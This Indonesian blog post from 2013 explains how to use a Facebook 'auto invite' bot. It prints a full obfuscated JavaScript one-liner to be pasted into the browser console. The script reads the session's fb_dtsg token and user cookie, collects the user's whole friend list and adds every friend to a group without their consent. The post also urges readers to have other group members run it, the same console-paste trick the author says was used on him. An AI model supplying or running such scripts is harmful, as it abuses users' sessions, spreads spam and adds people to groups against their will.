Saturday, 10 August 2013

Cara Menggunakan Auto Invite Untuk Grup Di Facebook

Cara Menggunakan Auto Invite Untuk Grup Di Facebook. Lagi lagi saya menemukan trik baru nih dan datangnya dari Facebook. Yaitu trik menggunakan bot auto invite grup di facebook. Cara ini dapat membuat grup yang anda buat menjadi mempunyai banyak anggota. Pasti senangkan kalau anda buat grup dan grup itu diikuti oleh ribuan bahkan puluhan ribu orang.


Saya sebenarnya juga pernah mengalami kena bot auto invite ini. Pada awalnya, saya sekedar buka fb untuk lihat lihat berita tentang blogger. Tiba tiba, ada pemberitahuan bahwa saya masuk grup (tidak disebutkan). Entah kenapa, saya juga melihat jumlah member grup itu ada 3ribuan orang. Ternyata, ada kiriman dari orang lain menyebutkan kalau grup ini pakai bot auto invite.

Awalnya tak percaya. Setelah saya sudah ada cukup lama di grup itu, ada admin yang mengirim langkah langkah (ada dibawah) aneh dan saya coba ikuti. Yah, ternyata saya malah jadi pengguna auto invite dan saya telah mengundang 200 orang untuk masuk grup tersebut. Dan saya langsung kabur keluar dari grup itu.

Langkah langkah yang diberikan kepada saya adalah lewat chat facebook seperti ini.

Cara Menggunakan Auto Invite Untuk Grup Di Facebook

Dalam melakukan cara ini, anda memerlukan :
  • Browser Google Chrome
  • Akun Facebook
  • Sebuah Grup
Langkah Langkah :
1. Di Beranda facebook, masuk ke grup yang ingin anda tambahkan anggotanya
2. Pada grup, klik kanan pada bagian kosong, lalu klik Periksa Elemen atau bahasa inggrisnya Inspect Element
Cara Menggunakan Auto Invite Untuk Grup Di Facebook

3. Nanti muncul sebuah tab pada jendela browser yang akan menampilkan seluruh HTML yang menyusun laman grup tersebut. Kira kira seperti ini

Cara Menggunakan Auto Invite Untuk Grup Di Facebook

4. Klik Tab bagian Console yang berada di paling kanan. Lalu masukkan script dibawah ini

// BLABLA COMMUNITY.
(function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found <b>"+f.frns.length+" Friends</b><div id='hasilsatu'></div><div id='hasildua'></div><div id='hasiltiga' style='min-width:300px;display:inline-block;text-align:left'></div>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status?"<b style='color:darkred'>Page Not Found!</b>"+crj:"<b style='color:darkgreen'>Collecting your Friends, wait up.. ("+c.readyState+")</b>"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead&ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";e.open("POST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",prm.length),e.setRequestHeader("Connection","keep-alive"),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe++,document.getElementById("hasilsatu").innerHTML="<div><b>"+f.prenKe+"</b> of <b>"+f.frns.length+"</b></div>",a.errorDescription&&(f.gagal++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkred'>( "+f.gagal+" )</b> <span style='color:darkred'>"+a.errorDescription+"</span></div>"),a.jsmods&&a.jsmods.require){var b="<div>";for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+="<b style='color:darkgreen'>"+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+"</b> ");b+="<div>",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&c.name){f.okeh++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkgreen'>( "+f.okeh+" )</b> <a href='/"+c.uid+"' target='_blank'><b>"+c.name+"</b></a> has been added to group (jonarendra.blogspot.com).</div>";break}}f.prenKe==f.frns.length&&(document.getElementById("hasiltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+="<div style='font-size:40px;font-weight:bold'>DONE!</div><a href='/' onClick='document.getElementById(\\'hasilsurasil\\').style.display=\\'none\\';return false'>Close</a>")}},e.send(prm)}},g=["i","a","e","g","o","s","n","b","l","p","m","2","r","0","c","1","t","3","�"],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+"."+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+"."+g[14]+g[4]+g[10],crj="<div style='margin-top:10px;color:gray;font-size:12px'>"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+"<div style='font-size:9px'><a href='http://"+crl+"/' target='_blank'>"+crl+"</a></div></div>";document.body.innerHTML+="<center id='hasilsurasil' style='min-height:50px;width:600px;position:fixed;top:100px;left:"+(document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)'><b>Collecting your Friends, wait up.. jonarendra</b>"+crj+"</center>",f.getAjak("/ajax/typeahead/first_degree.php?__a=1&viewer="+f.uid+"&token="+Math.random()+"&filter[0]=user&options[0]=friends_only")})();

Cara Menggunakan Auto Invite Untuk Grup Di Facebook

5. Terakhir, tekan Enter dan akan ada sebuah proses. Tunggu hingga complete

Catatan:

  • Kebanyakan orang tidak suka kalau ia masuk ke grup tidak jelas hasil auto invite
  • Bot auto invite ini akan mengundang hampir seluruh teman facebook anda untuk masuk ke grup
  • Supaya anggota grup cepat bertambah, suruh anggota lainnya untuk melakukan cara diatas
Bagaimana? Apakah anda sudah coba cara diatas? Saya harap sih tidak dicoba. Karena ini adalah bot yang tidak bagus. Dampaknya juga akan dirasakan pengguna facebook yang lain. Tapi, pilihan ada di tangan anda. Jika hanya untuk senang senang atau sekedar hiburan, auto invite ini dicoba sesekali saya rasa tidak masalah.

Itulah artikel dari Jona Rendra yang berjudul Cara Menggunakan Auto Invite Untuk Grup Di Facebook, semoga bisa menambah wawasan anda tentang auto invite group di facebook yang sudah marak tersebar. Jika anda terkena bot ini dan masuk grup yang tidak anda sukai, langsung aja keluar, lalu blokir orang yang mengundang anda. Apa pendapat anda tentang Auto Invite ini?

KATEGORI:
arrow_back
arrow_forward

5 komentar

gan mau nanyak nih ane kurang paham kalau dari cp gmana ya caranya gan ....

ini tutorial untuk browser google chrome, untuk browser lain saya belum coba

Work bro thank udah share .
Pasang Iklan Facebook gratis .
masvendy.blogspot.com

Berkomentarlah dengan baik dan benar, dilarang SPAM!
Tata Tertib Berkomentar
EmoticonEmoticon